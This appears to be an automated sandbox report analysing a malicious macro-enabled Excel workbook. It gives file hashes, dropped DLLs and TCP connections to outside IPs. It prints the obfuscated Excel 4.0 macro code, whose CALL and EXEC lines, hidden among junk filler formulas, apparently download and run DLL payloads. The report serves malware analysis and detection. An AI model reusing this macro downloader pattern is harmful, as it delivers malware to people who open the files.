Preview:	.U.n.0....?..........C....I?.&..an.0.........,.\.Qo.7.pz.........7.V..^i......;.0.....Z..d../g..u....e}J...({........G+....!...~1.\|.....)s....,.I...o..c...{Y.e"...Hd..;.#R..BKP^.Y.n0D..{.dM..&.x.)Qa..^...Mm...\|?".....!......u.......r8.........Z..GXJ.....q9.~..'.aZ.a%.4%.......s..&.{txD. ....../?..........`.:nN6..?..XF.../>S..y[..r....F....1......!.S.E.u.h~t.n.9.....C......>...az.}@...^.....:...a;....."M....l..w..j.6/...?.......PK..........!.\lC.............[Content_Types].xml ...(................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$documents-1819557117.xlsm Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\ghnrope2.dll Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32+ executable (DLL) (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	185404
Entropy (8bit):	6.206741223040736
Encrypted:	false
SSDEEP:	1536:O65/LQ2n3qA3PSD1AWc15xX418gzMPA3MxGQk2x44XaN9QqGYwOo9:D/LQ26GPS5g1Xm1MY3+lx7oQqGnOo
MD5:	7D7BDC559AE699579A700645D0FD5F03
SHA1:	C4C0CA6B2B7779D870B0B69E5D7001453BABBFF0
SHA-256:	0A0B3D91698A46D409791D4DD866E56DDD70F91A3F1D4557A0CB2899BDA1E524
SHA-512:	3A815F4CEE13B0D491E6C527D30DB0FB9E77FB489F606539E8026A3C2797A3A52672378B9B0788C5DFD5953ECB11D1BA5F2AE30F493CDBBB42A49E42E4278016
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................................................Rich..........PE..d..._.p`.........." ......................................................................`.....................................................<...................................0...................................................0............................text............................... ..`.rdata..@...........................@..@.data...............................@....pdata...............~..............@..@........................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Microsoft Excel 2007+
Entropy (8bit):	7.878779807636458
TrID:	Excel Microsoft Office Open XML Format document (40004/1) 83.33% ZIP compressed archive (8000/1) 16.67%
File name:	documents-1819557117.xlsm
File size:	98253
MD5:	4dd14d22cd0272ae24128bb1356a842c
SHA1:	abf7d941f4ebf949816c5576060bfce76f836ae9
SHA256:	f06910daadc7c66c8e9064d0719ed6727d69c1f04ab13566cadbb6e7a9f52a7e
SHA512:	ccba2a4ea072bf9363c4d22d8668d0df99b8101fbcf9fd3f881267fa78cfde954aa749fa92907cf5ed0f700b29e538e2c258117e67b3374525c5a751ab036784
SSDEEP:	1536:nSRSI4oWt6JJwQz8jbzPmHnsBjFC6QomaIRUxPLe96bGAfe2hawpx:nSE7oWt6Xz8jbzP0n4BC6Qdkx60WMD
File Content Preview:	PK..........!.\lC.............[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4bcbcac

Static OLE Info

General
Document Type:	OpenXML
Number of OLE Files:	1

OLE File "documents-1819557117.xlsm"

Indicators
Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Macro 4.0 Code

"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL('Doc1'!AM19&""n"",'Doc1'!AM20&""A"",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM23,'Doc1'!AO15&"".dll"",0,0)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)""=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL('Doc1'!AM19&""n"",'Doc1'!AM20&""A"",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM24,'Doc1'!AO15&""1""&"".dll"",0,0)""=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL('Doc1'!AM19&""n"",'Doc1'!AM20&""A"",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM25,'Doc1'!AO15&""2""&"".dll"",0,0)""=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL('Doc1'!AM19&""n"",'Doc1'!AM20&""A"",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM26,'Doc1'!AO15&""3""&"".dll"",0,0)""=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL('Doc1'!AM19&""n"",'Doc1'!AM20&""A"",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM27,'Doc1'!AO15&""4""&"".dll"",0,0)""=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)='Doc1'!AO20()=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)"

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""..\ghnrope""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&AO15)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&BP106)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&BP107)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&BP108)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&BP109)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 9, 2021 16:26:04.407053947 CEST	49165	80	192.168.2.22	8.211.4.209
Apr 9, 2021 16:26:04.428515911 CEST	80	49165	8.211.4.209	192.168.2.22
Apr 9, 2021 16:26:04.428674936 CEST	49165	80	192.168.2.22	8.211.4.209
Apr 9, 2021 16:26:04.429071903 CEST	49165	80	192.168.2.22	8.211.4.209
Apr 9, 2021 16:26:04.494443893 CEST	80	49165	8.211.4.209	192.168.2.22
Apr 9, 2021 16:26:04.824918032 CEST	80	49165	8.211.4.209	192.168.2.22
Apr 9, 2021 16:26:04.824984074 CEST	80	49165	8.211.4.209	192.168.2.22
Apr 9, 2021 16:26:04.825164080 CEST	49165	80	192.168.2.22	8.211.4.209
Apr 9, 2021 16:26:04.825476885 CEST	49165	80	192.168.2.22	8.211.4.209
Apr 9, 2021 16:26:04.846807003 CEST	80	49165	8.211.4.209	192.168.2.22
Apr 9, 2021 16:26:05.868976116 CEST	49166	80	192.168.2.22	8.211.4.209
Apr 9, 2021 16:26:05.888566971 CEST	80	49166	8.211.4.209	192.168.2.22
Apr 9, 2021 16:26:05.888665915 CEST	49166	80	192.168.2.22	8.211.4.209
Apr 9, 2021 16:26:05.889586926 CEST	49166	80	192.168.2.22	8.211.4.209
Apr 9, 2021 16:26:05.950907946 CEST	80	49166	8.211.4.209	192.168.2.22
Apr 9, 2021 16:26:06.271588087 CEST	80	49166	8.211.4.209	192.168.2.22
Apr 9, 2021 16:26:06.271783113 CEST	49166	80	192.168.2.22	8.211.4.209
Apr 9, 2021 16:26:06.272069931 CEST	49166	80	192.168.2.22	8.211.4.209
Apr 9, 2021 16:26:06.290291071 CEST	80	49166	8.211.4.209	192.168.2.22
Apr 9, 2021 16:26:06.317785978 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:06.466444016 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:06.466589928 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:06.485198021 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:06.631395102 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:06.662312031 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:06.662343979 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:06.662359953 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:06.662518024 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:06.703385115 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:06.873261929 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:06.873492002 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.179445028 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.363543987 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.363601923 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.363648891 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.363686085 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.363723040 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.363770962 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.363804102 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.363832951 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.363859892 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.363869905 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.363889933 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.363905907 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.363933086 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.363964081 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.368386030 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.512471914 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.512543917 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.512586117 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.512623072 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.512660980 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.512679100 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.512697935 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.512703896 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.512734890 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.512746096 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.512768030 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.512773991 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.512799025 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.512811899 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.512845993 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.512859106 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.512872934 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.512901068 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.512902021 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.512938023 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.512959957 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.512975931 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.513009071 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.513012886 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.513037920 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.513048887 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.513067961 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.513087034 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.513099909 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.513123989 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.513129950 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.513170958 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.513175964 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.513211966 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.513223886 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.513247967 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.513252974 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.513305902 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.513542891 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.521527052 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.663803101 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.663866997 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.663892031 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.663923025 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.664041042 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.664191008 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.664228916 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.664261103 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.664272070 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.664288998 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.664316893 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.664319992 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.664345980 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.664350033 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.664376974 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.664377928 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.664407015 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.664412022 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.664439917 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.664489985 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.664520025 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.664541006 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.664549112 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.664570093 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.664578915 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.664599895 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.664625883 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.664628029 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.664680958 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.664725065 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.664777040 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.664784908 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.664814949 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.664834976 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.664861917 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.664863110 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.664891958 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.664915085 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.664937973 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.664940119 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.664977074 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.664985895 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.665009022 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.665018082 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.665038109 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.665049076 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.665066957 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.665077925 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.665095091 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.665106058 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.665122986 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.665134907 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.665152073 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.665168047 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.665180922 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.665198088 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.665215015 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.665225029 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.665257931 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.673226118 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.686570883 CEST	49167	443	192.168.2.22	162.251.80.27
Apr 9, 2021 16:26:08.832587957 CEST	443	49167	162.251.80.27	192.168.2.22
Apr 9, 2021 16:26:08.886970997 CEST	49170	443	192.168.2.22	67.222.38.97
Apr 9, 2021 16:26:09.048826933 CEST	443	49170	67.222.38.97	192.168.2.22
Apr 9, 2021 16:26:09.049004078 CEST	49170	443	192.168.2.22	67.222.38.97
Apr 9, 2021 16:26:09.050050974 CEST	49170	443	192.168.2.22	67.222.38.97
Apr 9, 2021 16:26:09.210190058 CEST	443	49170	67.222.38.97	192.168.2.22
